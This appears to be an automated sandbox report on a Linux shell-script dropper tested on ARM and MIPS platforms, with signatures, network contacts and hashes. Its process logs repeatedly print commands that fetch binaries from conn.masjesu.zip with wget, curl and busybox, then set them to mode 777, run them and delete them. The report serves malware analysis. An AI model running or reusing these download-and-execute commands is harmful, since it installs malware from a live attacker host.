Analysis Overview
SHA256
d44ff432211daf9c1be45ff0a6c526870a8a142de999a752c9c35c569a8bd6c9
Threat Level: Shows suspicious behavior
The file 1fe6de8ea9975b311fc0e7781eb48271.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-25 01:07
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
debian9-armhf-20240611-en
Max time kernel
148s
Max time network
9s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
Network
| Count | Country | Destination | Domain | Proto |
|---|---|---|---|---|
| 2 | US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
debian9-mipsbe-20240611-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 16 | N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 1 | N/A | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | N/A |
| 1 | N/A | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | N/A |
| 1 | N/A | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | N/A |
| 1 | N/A | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | N/A |
| 1 | N/A | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | N/A |
| 1 | N/A | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | N/A |
| 1 | N/A | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | N/A |
| 1 | N/A | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | N/A |
| 1 | N/A | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | N/A |
| 1 | N/A | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | N/A |
| 1 | N/A | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | N/A |
| 2 | N/A | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | N/A |
| 2 | N/A | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | N/A |
| 1 | N/A | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | N/A |
Reads runtime system information
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 17 | File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 17 | N/A | N/A | /usr/bin/curl | N/A |
| 17 | N/A | N/A | /usr/bin/wget | N/A |
| 16 | N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 1 | File opened for modification | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /usr/bin/curl | N/A |
| 2 | File opened for modification | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /usr/bin/curl | N/A |
| 2 | File opened for modification | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /usr/bin/curl | N/A |
| 2 | File opened for modification | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /usr/bin/curl | N/A |
| 1 | File opened for modification | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/chmod
[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/rm
[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/chmod
[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/rm
[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/chmod
[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/rm
[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/chmod
[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/rm
[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/chmod
[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/rm
[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/chmod
[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/rm
[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/chmod
[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/rm
[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/chmod
[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/rm
[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/chmod
[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/rm
[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/chmod
[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/rm
[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/chmod
[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/rm
[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/chmod
[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/rm
[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
Network
| Count | Country | Destination | Domain | Proto |
|---|---|---|---|---|
| 50 | US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| 32 | DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| 18 | BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
| Hash | Value |
|---|---|
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
debian9-mipsel-20240611-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
File and Directory Permissions Modification
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 28 | N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 2 | N/A | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | N/A |
| 2 | N/A | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | N/A |
| 2 | N/A | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | N/A |
| 2 | N/A | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | N/A |
| 2 | N/A | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | N/A |
| 2 | N/A | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | N/A |
| 2 | N/A | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | N/A |
| 2 | N/A | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | N/A |
| 2 | N/A | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | N/A |
| 2 | N/A | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | N/A |
| 2 | N/A | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | N/A |
| 2 | N/A | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | N/A |
| 2 | N/A | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | N/A |
| 2 | N/A | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | N/A |
Reads runtime system information
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 28 | File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Count | Description | Indicator | Process | Target |
|---|---|---|---|---|
| 19 | N/A | N/A | /bin/busybox | N/A |
| 25 | N/A | N/A | /usr/bin/curl | N/A |
| 20 | N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg | /usr/bin/curl | N/A |
| File opened for modification | /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/chmod
[chmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
[./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/bin/rm
[rm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/chmod
[chmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23
[./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/bin/rm
[rm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/chmod
[chmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb
[./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/bin/rm
[rm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/chmod
[chmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE
[./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/bin/rm
[rm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/chmod
[chmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm
[./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/bin/rm
[rm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/chmod
[chmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO
[./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
/bin/rm
[rm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO]
